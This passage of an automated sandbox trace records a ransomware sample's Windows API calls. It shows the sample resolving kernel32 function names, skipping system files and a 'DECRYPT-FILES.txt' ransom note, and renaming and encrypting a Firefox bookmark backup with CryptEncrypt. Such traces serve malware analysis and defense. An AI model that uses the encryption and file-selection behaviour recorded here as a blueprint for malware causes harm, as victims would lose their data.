lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.714] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.714] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.714] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.714] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.714] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.714] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.714] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.714] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.714] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.714] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.714] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.714] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.714] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.714] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.714] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.714] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.714] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.714] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.714] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.715] lstrlenA (lpString="DELETEATOM") returned 10 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.715] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.715] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.715] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.715] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.715] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.715] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.715] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.715] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.715] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.715] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.715] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.715] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.715] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.715] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.715] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.715] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.715] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.715] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.716] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.716] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.716] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.716] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.716] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.716] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.716] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.716] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.716] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.716] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.716] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.716] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.716] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.716] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.716] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.716] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.716] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.716] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.716] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.717] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.717] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.717] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.717] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.717] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.717] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.717] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.717] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.717] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.717] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.717] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.717] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned 131 [0080.717] wsprintfW (in: param_1=0x3f2d238, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.CMOvhG") returned 138 [0080.717] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.CMOvhG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.cmovhg"), dwFlags=0x0) returned 1 [0080.718] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.718] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.718] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.718] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85017d10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x85017d10, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85017d10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarks-2017-06-16_5.json", cAlternateFileName="BOOKMA~2.JSO")) returned 1 [0080.719] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="DECRYPT-FILES.txt") returned -1 [0080.719] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="autorun.inf") returned 1 [0080.719] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="boot.ini") returned -1 [0080.719] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="desktop.ini") returned -1 [0080.719] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="ntuser.dat") returned -1 [0080.719] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="iconcache.db") returned -1 [0080.719] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="bootsect.bak") returned -1 [0080.719] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="ntuser.dat.log") returned -1 [0080.719] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="thumbs.db") returned -1 [0080.719] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="Bootfont.bin") returned -1 [0080.719] lstrlenW (lpString="bookmarks-2017-06-16_5.json") returned 27 [0080.719] lstrcmpiW (lpString1="json", lpString2="lnk") returned -1 [0080.719] lstrcmpiW (lpString1="json", lpString2="exe") returned 1 [0080.719] lstrcmpiW (lpString1="json", lpString2="sys") returned -1 [0080.719] lstrcmpiW (lpString1="json", lpString2="dll") returned 1 [0080.719] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0080.719] lstrlenW (lpString="bookmarks-2017-06-16_5.json") returned 27 [0080.719] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0080.719] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="bookmarks-2017-06-16_5.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" [0080.719] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.719] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0080.720] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x3f2d200 | out: lpFileSize=0x3f2d200*=3035) returned 1 [0080.720] CreateFileMappingW (hFile=0x468, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x46c [0080.720] MapViewOfFile (hFileMappingObject=0x46c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.744] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.744] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.744] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.745] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d168*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d168*=0x100) returned 1 [0080.745] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.745] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.746] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.746] CloseHandle (hObject=0x46c) returned 1 [0080.746] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.746] WriteFile (in: hFile=0x468, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d188, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d188*=0x108, lpOverlapped=0x0) returned 1 [0080.747] CloseHandle (hObject=0x0) returned 0 [0080.747] CloseHandle (hObject=0x468) returned 1 [0080.747] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.747] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.747] GetTickCount () returned 0x114cabf [0080.747] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.748] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.748] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.748] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.748] lstrlenA (lpString="kernel32.dll") returned 12 [0080.748] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.748] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.748] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.748] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.748] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.748] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.748] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.749] lstrlenA (lpString="ADDATOMA") returned 8 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.749] lstrlenA (lpString="ADDATOMW") returned 8 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.749] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.749] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.749] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.749] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.749] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.749] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.749] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.749] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.749] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.749] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.749] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.749] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.749] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.749] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.749] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.749] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.750] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.750] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.750] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.750] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.750] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.750] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.750] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.750] lstrlenA 